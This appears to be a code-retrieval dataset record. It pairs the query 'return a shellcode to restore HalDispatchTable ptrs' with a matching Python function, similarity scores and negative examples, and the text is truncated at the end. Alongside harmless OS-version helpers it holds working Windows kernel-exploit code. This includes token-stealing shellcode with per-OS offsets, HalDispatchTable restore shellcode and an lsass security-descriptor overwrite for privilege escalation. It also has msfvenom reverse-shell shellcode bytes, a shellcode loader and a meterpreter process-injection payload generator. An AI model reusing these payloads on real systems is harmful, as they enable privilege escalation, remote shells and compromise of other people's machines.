[ "def parse_os(self) -> None:\n if not self.os:\n self.os = OS(\n self.user_agent,\n self.ua_hash,\n self.ua_spaceless,\n self.VERSION_TRUNCATION,\n ).parse()\n self.all_details['os'] = self.os.ua_data", "def get_platform(init):\n\n platform = {}\n tmp = re.sub(r'([a-zA-Z])([0-9.])', r'\\1 \\2', re.sub(r'([,_;:-])', '.', init))\n\n split = tmp.split(\" \")\n if len(split) > 1 and split[0].lower().startswith(\"win\"):\n platform['os'] = \"Windows\"\n platform['version'] = split[1]\n elif tmp == \"VISTA\":\n platform['os'] = \"Windows\"\n platform['version'] = \"Vista\"\n else:\n platform['os'] = tmp.title()\n platform['version'] = None\n return platform", "def setosvariablesx86():\n\tKPROCESS = ''\n\tAPLINKS = ''\n\tUPID = ''\n\tTOKEN = ''\n\tversion = sys.getwindowsversion()\n\n\tif((version.major == 5) and (version.minor == 1) and ('3' in version.service_pack)):\n\t\t# the target machine's OS is Windows XP SP3\n\t\tprint \"[*] OS version: Windows XP SP3\"\n\t\tKPROCESS = '\\x44'\n\t\tTOKEN\t= '\\xC8'\n\t\tUPID\t = '\\x84'\n\t\tAPLINKS = '\\x88'\n \n\telif((version.major == 5) and (version.minor == 2) and ('2' in version.service_pack)):\n\t\t# the target machine's OS is Windows Server 2003 SP2\n\t\tprint \"[*] OS version: Windows Server 2003 SP2\"\n\t\tKPROCESS = '\\x38'\n\t\tTOKEN\t= '\\xD8'\n\t\tUPID\t = '\\x94'\n\t\tAPLINKS = '\\x98'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type == VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Vista SP1 / SP2\n\t\tprint \"[*] OS version: Windows Vista SP1 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type != VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Server 2008 / SP2\n\t\tprint \"[*] OS version: Windows Server 2008 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 1)):\n\t\t# the target machine's OS is Windows 7 / SP1\n\t\tprint \"[*] OS version: Windows 7 / SP1\"\n\t\tKPROCESS = '\\x50'\n\t\tTOKEN\t= '\\xF8'\n\t\tUPID\t = '\\xB4'\n\t\tAPLINKS = '\\xB8'\n\t\n\telse:\n\t\tprint \"[-] No matching OS version, exiting...\"\n\t\tsys.exit(-1)\n\t\n\treturn (KPROCESS,APLINKS,UPID,TOKEN)", "def __init__(__self__, *,\n os_version: Optional[pulumi.Input['WindowsNodeConfigOsVersion']] = None):\n if os_version is not None:\n pulumi.set(__self__, \"os_version\", os_version)", "def _init_obo_version(self, line):\n if line[0:14] == \"format-version\":\n self.format_version = line[16:-1]\n if line[0:12] == \"data-version\":\n self.data_version = line[14:-1]", "def set_version(self, protocol_version):\n self.version = protocol_version\n self.version_bytes = str(protocol_version).encode(\"latin1\")\n self.version_header = self.version_bytes + PROTOCOL_3x_HEADER\n if protocol_version == 3.2: # 3.2 behaves like 3.3 with type_0d\n # self.version = 3.3\n self.dev_type = \"type_0d\"\n elif protocol_version == 3.4:\n self.dev_type = \"v3.4\"", "def init_linuxVersion(self):\n releaseDic = collections.OrderedDict() # 排序的字典\n releaseDic['/etc/oracle-release'] = self.__getOracleVersion\n releaseDic['/etc/redhat-release'] = self.__getRedhatVersion\n releaseDic['/etc/debian_version'] = self.__getDebianVersion\n releaseDic['/etc/SuSE-release'] = self.__getSuSEVersion\n # for releaseFilePath in releaseDic.keys():\n # print(releaseFilePath)\n #\n # releaseDic = {'/etc/oracle-release': self.__getOracleVersion,\n # '/etc/redhat-release': self.__getRedhatVersion,\n # '/etc/debian_version': self.__getDebianVersion,\n # '/etc/SuSE-release': self.__getSuSEVersion}\n for releaseFilePath in releaseDic.keys():\n ret, resultErr = self.ksp_ssh.ssh_execute_command(\n '[[ -f %s ]] && echo \"exist\" || echo \"not exist\"' % releaseFilePath)\n if 'not' in ret:\n continue\n else:\n return releaseDic.get(releaseFilePath, self.__getNullVersion)()\n return \"unknownVendor\", \"unknownRelease\"", "def osversion():\n return platform()", "def __init__(self):\n self.update_os_packages()\n self.upgrade_os_packages()", "def set_os_version(self, nVmOsVersion):\n\t\tcall_sdk_function('PrlVmCfg_SetOsVersion', self.handle, nVmOsVersion)", "def version():\n g.data['oar_server_version'] = VERSION\n g.data['oar_version'] = VERSION\n g.data['oar_lib_version'] = VERSION\n g.data['api_version'] = API_VERSION\n g.data['apilib_version'] = API_VERSION", "def _set_version(args: Any):\n if args['msc']:\n version = 'msc'\n elif args['nx']:\n version = 'nx'\n elif args['optistruct']:\n version = 'optistruct'\n elif args['nasa95']:\n version = 'nasa95'\n elif args['mystran']:\n version = 'mystran'\n else:\n version = None\n args['version'] = version\n del args['msc'], args['nx'], args['nasa95'], args['mystran'], args['optistruct']", "def get_system_information(self):\n\t\tsys = platform.uname()\n\t\treturn {\n\t\t\t'hostname': sys.node,\n\t\t\t'operating_system': sys.system,\n\t\t\t'version': sys.version,\n\t\t\t'release': sys.release,\n\t\t\t'processor' : sys.processor,\n\t\t\t'processor_type': sys.machine,\n\t\t}", "def gather_system_versions(self):\n # Get Mac model ID\n self.hw_version = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"IOPlatformExpertDevice\")),\n \"model\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\")\n\n if \"imacpro\" in self.hw_version.lower():\n # iMac Pro stores it's EFI data different due it's new architecture\n # so grab the EFI & SMC ROM versions appropriately\n raw_efi_list = []\n raw_rom_info = str(\n IORegistryEntryCreateCFProperty(\n IORegistryEntryFromPath(\n 0,\n \"IODeviceTree:/rom\"),\n \"apple-rom-info\",\n None,\n 0))\n for data in raw_rom_info.split(\"\\n\"):\n if data.strip().startswith(\"BIOS ID\"):\n raw_efi_list = data.split(\":\")[1].strip().split(\".\")\n break\n else:\n self.message(\n \"[-] Could not find raw EFI data to determine EFI versions. Exiting....\")\n return False\n\n self.efi_version = \"%s.%s.%s\" % (\n raw_efi_list[0], raw_efi_list[2], raw_efi_list[3])\n # Can't currently find the SMC version like this on imac pros ....\n # self.smc_version = str(IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0, IOServiceMatching(\"AppleSMC\")), \"smc-version\", None, 0))\n self.smc_version = \"\"\n else:\n # EFI & SMC ROM versions\n self.smc_version = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"AppleSMC\")),\n \"smc-version\",\n None,\n 0))\n raw_efi = str(\n IORegistryEntryCreateCFProperty(\n IORegistryEntryFromPath(\n 0,\n \"IODeviceTree:/rom\"),\n \"version\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\").split(\".\")\n self.efi_version = \"%s.%s.%s\" % (\n raw_efi[0], raw_efi[2], raw_efi[3])\n\n # Set the salt to be the MAC address of the system, using the MAC as a salt in this manner\n # helps ensure that the hashed sysuuid is pseudonymous. We don't want to know the sysuuid's\n # value, but we do want it to be unique however. The Salt value is\n # never submitted to the API\n salt = hex(getnode())\n sys_uuid = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"IOPlatformExpertDevice\")),\n \"IOPlatformUUID\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\")\n self.h_sys_uuid = hashlib.sha256(salt + sys_uuid).hexdigest()\n\n # Get the Board-ID, this is how EFI files are matched to running\n # hardware - Nastee\n self.board_id = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"IOPlatformExpertDevice\")),\n \"board-id\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\")\n\n # Get OS version\n self.os_version = commands.getoutput(\"sw_vers -productVersion\")\n\n # Get build number\n self.build_num = commands.getoutput(\"sw_vers -buildVersion\")\n\n # Carve out the major version as we use this a bunch\n # self.os_maj_ver = \".\".join(self.os_version.split(\".\")[:2])\n\n # Add gathered info to the dictionary to query the API with\n self.endpoints_to_check[\"127.0.0.1\"] = {\n \"hashed_uuid\": self.h_sys_uuid,\n \"hw_ver\": self.hw_version,\n \"rom_ver\": self.efi_version,\n \"smc_ver\": self.smc_version,\n \"board_id\": self.board_id,\n \"os_ver\": self.os_version,\n \"build_num\": self.build_num}\n\n return True", "def get_os_version(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetOsVersion', self.handle)", "def set_platform(self, platform_dict):\n if not os.path.exists(self.file_path):\n print(\"netCDF file does not exist, exiting without saving Platform group...\")\n elif self.format == '.nc':\n with netCDF4.Dataset(self.file_path, 'a', format='NETCDF4') as ncfile:\n plat = ncfile.createGroup('Platform')\n [plat.setncattr(k, v) for k, v in platform_dict.items()]\n elif self.format == '.zarr' and not self.append_zarr: # Do not save platform if appending\n zarrfile = zarr.open(self.file_path, mode='a')\n plat = zarrfile.create_group('Platform')\n for k, v in platform_dict.items():\n plat.attrs[k] = v", "def _extract_nos_version(self, data: str) -> None:\n if self.devtype == \"linux\":\n for line in data.splitlines():\n if line.startswith(\"VERSION_ID\"):\n self.version = line.split('=')[1] \\\n .strip().replace('\"', '')\n break\n else:\n self.version = \"all\"\n self.logger.error(\n f'Cannot parse version from {self.address}:{self.port}')", "def detect_os(self, env=None):\n if env is None:\n env = os.environ\n if 'ROS_OS_OVERRIDE' in env:\n splits = env[\"ROS_OS_OVERRIDE\"].split(':')\n self._os_name = splits[0]\n if len(splits) > 1:\n self._os_version = splits[1]\n if len(splits) > 2:\n self._os_codename = splits[2]\n else:\n self._os_codename = ''\n else:\n self._os_version = self._os_codename = ''\n self._override = True\n else:\n for os_name, os_detector in self._os_list:\n if os_detector.is_os():\n self._os_name = os_name\n self._os_version = os_detector.get_version()\n self._os_codename = os_detector.get_codename()\n self._os_detector = os_detector\n break\n\n if self._os_name:\n return self._os_name, self._os_version, self._os_codename\n else: # No solution found\n attempted = [x[0] for x in self._os_list]\n raise OsNotDetected(\"Could not detect OS, tried %s\" % attempted)", "def java_ver(release='', vendor='', vminfo=('', '', ''), osinfo=('', '', '')):\n # Import the needed APIs\n try:\n import java.lang\n except ImportError:\n return release, vendor, vminfo, osinfo\n\n vendor = _java_getprop('java.vendor', vendor)\n release = _java_getprop('java.version', release)\n vm_name, vm_release, vm_vendor = vminfo\n vm_name = _java_getprop('java.vm.name', vm_name)\n vm_vendor = _java_getprop('java.vm.vendor', vm_vendor)\n vm_release = _java_getprop('java.vm.version', vm_release)\n vminfo = vm_name, vm_release, vm_vendor\n os_name, os_version, os_arch = osinfo\n os_arch = _java_getprop('java.os.arch', os_arch)\n os_name = _java_getprop('java.os.name', os_name)\n os_version = _java_getprop('java.os.version', os_version)\n osinfo = os_name, os_version, os_arch\n\n return release, vendor, vminfo, osinfo", "async def osversion(self):\n\n await self.bot.say(box(release(), 'Bash'))", "def update_runtime_variables(self) -> None:\n # Opportunistic, works if SELinux not enforced\n super().update_runtime_variables()\n self.parse_sysconfig_var()", "def test_device_info_guess_os(properties, expected_os):\n assert DeviceInfo(properties).operating_system == expected_os", "def get_os_info(hass: HomeAssistant) -> dict[str, Any] | None:\n return hass.data.get(DATA_OS_INFO)", "def os_version(self, os_version):\n\n self._os_version = os_version", "def setUp(self):\n self.os = \"debian\"", "def known_os_type():\n return 'Linux'", "def mac_ver(release='', versioninfo=('', '', ''), machine=''):\n\n # First try reading the information from an XML file which should\n # always be present\n info = _mac_ver_xml()\n if info is not None:\n return info\n\n # If that also doesn't work return the default values\n return release, versioninfo, machine", "def __init__(self) -> None:\n super().__init__()\n self.version = 6\n (self.ofproto, self.ofparser) = ofproto_protocol._versions[self.version]\n self.mac_to_port = {}", "def _setup(self) -> None:\n self._api = get_api(\n self._password,\n self._host,\n self._username,\n self._port,\n self._ssl,\n )\n\n self._info = self._api.get_info()\n self.device_name = self._info.get(\"DeviceName\", DEFAULT_NAME)\n self.model = self._info.get(\"ModelName\")\n self.firmware_version = self._info.get(\"Firmwareversion\")\n\n for model in MODELS_V2:\n if self.model.startswith(model):\n self._method_version = 2", "def update(self):\n if self._var_id == UTILISATION_MONITOR_VERSION:\n version = dockerVersion(self._api)\n self._state = version.get('version', None)\n self._attributes['api_version'] = version.get('api_version', None)\n self._attributes['os'] = version.get('os', None)\n self._attributes['arch'] = version.get('arch', None)" ]
[ "0.660985", "0.6493364", "0.6464224", "0.6365165", "0.61576086", "0.61220306", "0.6116219", "0.60081536", "0.5985952", "0.59510773", "0.59318006", "0.5889762", "0.5821946", "0.58032054", "0.57683593", "0.5690011", "0.56563735", "0.56455976", "0.56320095", "0.5627637", "0.56080556", "0.55995905", "0.55937076", "0.5589993", "0.5564112", "0.5563756", "0.5543639", "0.5537523", "0.5532638", "0.55086285" ]
0.65764755
1
Retrun a shellcode to retore HalDispatchTable ptrs
def retore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation): if HaliQuerySystemInformation == 0x0 or HalpSetSystemInformation == 0x0: return "" else: shellcode = ( "\x31\xc0" "\xb8" + struct.pack("L", HalpSetSystemInformation) + "\xa3" + struct.pack("L", HalDispatchTable + 0x8) + "\xb8" + struct.pack("L", HaliQuerySystemInformation) + "\xa3" + struct.pack("L", HalDispatchTable + 0x4) ) return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def _exploit(code):\n shellcode_ptr, shellcode_len = _ret_shellcode_buffer() # shellcode virtual allocation\n\n debug_print(\"\\n[*] User-land shellcode allocated at: [0x%x]\\n\" % shellcode_ptr)\n debug_print(hexdump(shellcode_ptr, 32))\n \"\"\"\n 3: kd> !process 0 0 lsass.exe\n PROCESS [87662d40] SessionId: 1 Cid: 0214 Peb: 7ffd9000 ParentCid: 01ac\n DirBase: be6e20e0 ObjectTable: 9aa8a008 HandleCount: 116.\n Image: lsass.exe\n\n 3: kd> dps 87662d40-4\n 87662d3c 8c005e1f => OVERFLOW HERE WITH [0x00000000] \n 87662d40 00260003 AND GET ALL PERMISSIONS OF [lsass.exe] process W/ WHATAEVER USER\n 87662d44 00000001\n 87662d48 87662d48\n 87662d4c 87662d48\n 87662d50 87662d50\n 87662d54 87662d50\n 87662d58 be6e20e0\n 87662d5c 00000000\n 87662d60 00000000\n\n 3: kd> !object 87662d40 \n Object: 87662d40 Type: (85611d58) Process\n ObjectHeader: [87662d28] (new version) => [dt nt!_OBJECT_HEADER 87662d28]\n HandleCount: 10 PointerCount: 106\n\n 3: kd> dt nt!_OBJECT_HEADER 87662d28 \n +0x000 PointerCount : 0n106\n +0x004 HandleCount : 0n10\n +0x004 NextToFree : 0x0000000a Void\n +0x008 Lock : _EX_PUSH_LOCK\n +0x00c TypeIndex : 0x7 ''\n +0x00d TraceFlags : 0 ''\n +0x00e InfoMask : 0x8 ''\n +0x00f Flags : 0 ''\n +0x010 ObjectCreateInfo : 0x82b44cc0 _OBJECT_CREATE_INFORMATION\n +0x010 QuotaBlockCharged : 0x82b44cc0 Void\n +0x014 SecurityDescriptor : 0x8c005e1d Void \n +0x018 Body : _QUAD\n\n 3: kd> !sd (0x8c005e1f - 0x7) => [SecurityDescription from lsass.exe process]\n ->Revision: 0x1\n ->Sbz1 : 0x0\n ->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n ->Owner : S-1-5-32-544\n ->Group : S-1-5-18\n ->Dacl : \n ->Dacl : ->AclRevision: 0x2\n ->Dacl : ->Sbz1 : 0x0\n ->Dacl : ->AclSize : 0x3c\n ->Dacl : ->AceCount : 0x2\n ->Dacl : ->Sbz2 : 0x0\n ->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[0]: ->AceFlags: 0x0\n ->Dacl : ->Ace[0]: ->AceSize: 0x14\n ->Dacl : ->Ace[0]: ->Mask : 0x001fffff\n ->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n ->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[1]: ->AceFlags: 0x0\n ->Dacl : ->Ace[1]: ->AceSize: 0x18\n ->Dacl : ->Ace[1]: ->Mask : 0x00121411\n ->Dacl : ->Ace[1]: ->SID: S-1-5-32-544\n\n ->Sacl : \n ->Sacl : ->AclRevision: 0x2\n ->Sacl : ->Sbz1 : 0x0\n ->Sacl : ->AclSize : 0x1c\n ->Sacl : ->AceCount : 0x1\n ->Sacl : ->Sbz2 : 0x0\n ->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n ->Sacl : ->Ace[0]: ->AceFlags: 0x0\n ->Sacl : ->Ace[0]: ->AceSize: 0x14\n ->Sacl : ->Ace[0]: ->Mask : 0x00000003\n ->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n \"\"\"\n \n lsass_pid = getPidByName(\"lsass.exe\")\n debug_print(\"\\n[!] lsass.exe PID: 0x%x\\n\" % lsass_pid)\n \n leaked_objects = get_handles(lsass_pid) # return lsass.exe handles (nt!_EPROCESS)\n \n #if leaked_objects:\n #debug_print(\"\\n[+] lsass.exe nt!_EPROCESS address leaked!!: [0x%x]\" % leaked_objects)\n \n for leak_obj in leaked_objects:\n\n SecurityDescription = leak_obj - 4 # nullify SecurityDescription located at [_EPROCESS - 4]\n debug_print(\"\\t\\t[*] Address of SecurityDescription to be nullify: [0x%x]\" % SecurityDescription)\n \n payload = struct.pack(\"<L\", SecurityDescription)\n payload_ptr = id(payload) + 0x14\n payload_len = len(payload)\n \n # send custom payload\n _send_payload(\n payload_ptr,\n payload_len,\n code\n )\n\n debug_print(\"[+] Exploit Payload Sent!\")\n debug_print(\"[!] Getting nt-authority/SYSTEM impersonated process shell...\")\n \n winlogon_pid = getPidByName(\"winlogon.exe\")\n return inject_shellcode(winlogon_pid) # get SYSTEM shell", "def execute_64bits_code_from_syswow(shellcode):\n if not windows.current_process.is_wow_64:\n raise ValueError(\"Calling execute_64bits_code_from_syswow from non-syswow process\")\n addr = windows.winproxy.VirtualAlloc(dwSize=0x1000)\n # post-exec 32bits stub (xor eax, eax; ret)\n ret = \"\\xC3\"\n ret_addr = addr\n shell_code_addr = ret_addr + len(ret) + len(dummy_jump)\n # ljmp\n jump = \"\\xea\" + struct.pack(\"<I\", shell_code_addr) + chr(CS_64bits) + \"\\x00\\x00\"\n jump_addr = ret_addr + len(ret)\n # Return to 32bits stub\n shellcode += genere_return_32bits_stub(ret_addr)\n # WRITE ALL THE STUBS\n windows.current_process.write_memory(ret_addr, ret)\n windows.current_process.write_memory(jump_addr, jump)\n windows.current_process.write_memory(shell_code_addr, shellcode)\n # Execute\n exec_stub = ctypes.CFUNCTYPE(HRESULT)(jump_addr)\n return exec_stub()", "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def disassemble(self, script):\n return ' '.join(self.opcode_list(script))", "def get_idcode_opcode(bsdl_as_json):\n instruction_registers = bsdl_as_json[\"instruction_register_description\"][\"instruction_opcodes\"]\n idcode_instruction = next(\n reg for reg in instruction_registers if reg[\"instruction_name\"] == \"IDCODE\"\n )\n idcode_opcode = idcode_instruction[\"opcode_list\"][0]\n return idcode_opcode", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def process(opcode):\n opcode.process()", "def extract_code(self, data):\n current = struct.calcsize(b'iiii')\n metadata = struct.unpack(b'iiii', data[:current])\n\n if metadata[0] != 0x78563412:\n raise InvalidPy2ExeFile(\"Invalid PYTHONSCRIPT header\")\n\n arcname = ''\n while six.indexbytes(data, current) != 0:\n arcname += chr(six.indexbytes(data, current))\n current += 1\n code_bytes = data[current + 1:]\n code_objects = marshal.loads(code_bytes)\n return code_objects", "def execute(self, symbol_table, test_mode=False):", "def execute(self, symbol_table, test_mode=False):", "def _interpret(cls, code):\n namespace = {}\n namespace.update(selectors.SELECTORS)\n exec(code, namespace)\n header = LowerCaseDict(namespace[\"header\"])\n selector = namespace[\"selector\"]\n comment = namespace.get(\"comment\", None)\n if isinstance(selector, selectors.Parameters):\n return header, selector.instantiate(header), comment\n elif isinstance(selector, dict):\n return header, selector, comment\n else:\n raise 